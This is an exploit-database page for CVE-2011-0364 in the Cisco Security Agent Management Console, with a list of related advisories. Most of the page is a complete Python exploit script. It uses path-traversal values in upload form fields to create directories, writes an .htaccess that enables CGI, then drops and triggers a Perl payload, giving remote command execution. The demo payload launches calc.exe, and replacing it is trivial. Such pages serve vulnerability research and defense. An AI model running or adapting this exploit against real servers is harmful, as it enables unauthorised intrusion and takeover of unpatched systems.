Cisco Security Agent Management Console Command Execution

🗓️ 12 Apr 2011 00:00:00Reported by Gerry EisenhaurType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Cisco Security Agent Console Command Executio

Reporter	Title	Published	Views	Family All 20
0day.today	Cisco Security Agent Management Console â€˜st_uploadâ€™ RCE Exploit	13 Apr 201100:00	–	zdt
ATTACKERKB	Cisco Security Agent Management Console st_upload File Creation	19 Feb 201100:00	–	attackerkb
Circl	CVE-2011-0364	12 Apr 201100:00	–	circl
Cisco	Management Center for Cisco Security Agent Remote Code Execution Vulnerability	16 Feb 201116:00	–	cisco
Tenable Nessus	Management Center for Cisco Security Agents Remote Code Execution (cisco-sa-20110216-csa)	18 Sep 201300:00	–	nessus
Check Point Advisories	Cisco Security Agent Management Center Code Execution (CVE-2011-0364)	3 Apr 201100:00	–	checkpoint_advisories
CVE	CVE-2011-0364	18 Feb 201123:00	–	cve
Cvelist	CVE-2011-0364	18 Feb 201123:00	–	cvelist
Exploit DB	Cisco Security Agent Management Console - 'st_upload' Remote Code Execution	12 Apr 201100:00	–	exploitdb
exploitpack	Cisco Security Agent Management Console - st_upload Remote Code Execution	12 Apr 201100:00	–	exploitpack

`#!/usr/bin/env python  
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)  
# gerry eisenhaur <[email protected]>  
  
import httplib  
import mimetools  
import StringIO  
  
_boundary = mimetools.choose_boundary()  
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'  
_csamc = "192.168.0.108"  
  
# we need to enable some scripting to get command access  
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"  
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",  
backdoor = "exec \"calc.exe\";"  
  
def send_request(params=None):  
buf = StringIO.StringIO()  
headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}  
  
for(key, value) in params.iteritems():  
buf.write('--%s\r\n' % _boundary)  
buf.write('Content-Disposition: form-data; name="%s"' % key)  
buf.write('\r\n\r\n%s\r\n' % value)  
buf.write('--' + _boundary + '--\r\n\r\n')  
body = buf.getvalue()  
  
conn = httplib.HTTPSConnection(_csamc)  
conn.request("POST", "/csamc60/agent", body, headers)  
response = conn.getresponse()  
print response.status, response.reason  
conn.close()  
  
def main():  
### Build up required dir tree  
dirtree = ["../bin/webserver/htdocs/diag/bin",  
"../bin/webserver/htdocs/diag/bin/webserver",  
"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]  
_params = {  
'host_uid': _host_uid,  
'jobname': None,  
'host': "aa",  
'diags': " ",  
'diagsu': " ",  
'profiler': " ",  
'extension': "gee",  
}  
for path in dirtree:  
print "[+] Creating directory: %s" % path  
_params['jobname'] = path  
send_request(_params)  
  
### Done building path, drop files  
print "[+] Dropping .htaccess"  
send_request({  
'host_uid': _host_uid,  
'jobname': '',  
'host': "/../bin/webserver/",  
'diags': "",  
'diagsu': "",  
'profiler': htaccess,  
'extension': "/../.htaccess",  
})  
  
print "[+] Dropping payload"  
send_request({  
'host_uid': _host_uid,  
'jobname': '',  
'host': "/../bin/webserver/htdocs/gerry",  
'diags': perl_path,  
'diagsu': "",  
'profiler': backdoor,  
'extension': "/../exploit.gee",  
})  
  
print "[+] Done, Executing dropped file."  
try:  
conn = httplib.HTTPSConnection(_csamc, timeout=1)  
conn.request("GET", "/csamc60/exploit.gee")  
response = conn.getresponse()  
print response.status, response.reason  
print response.read()  
except httplib.ssl.SSLError:  
pass  
print "[+] Finished."  
  
if __name__ == '__main__':  
main()  
  
`

12 Apr 2011 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.1312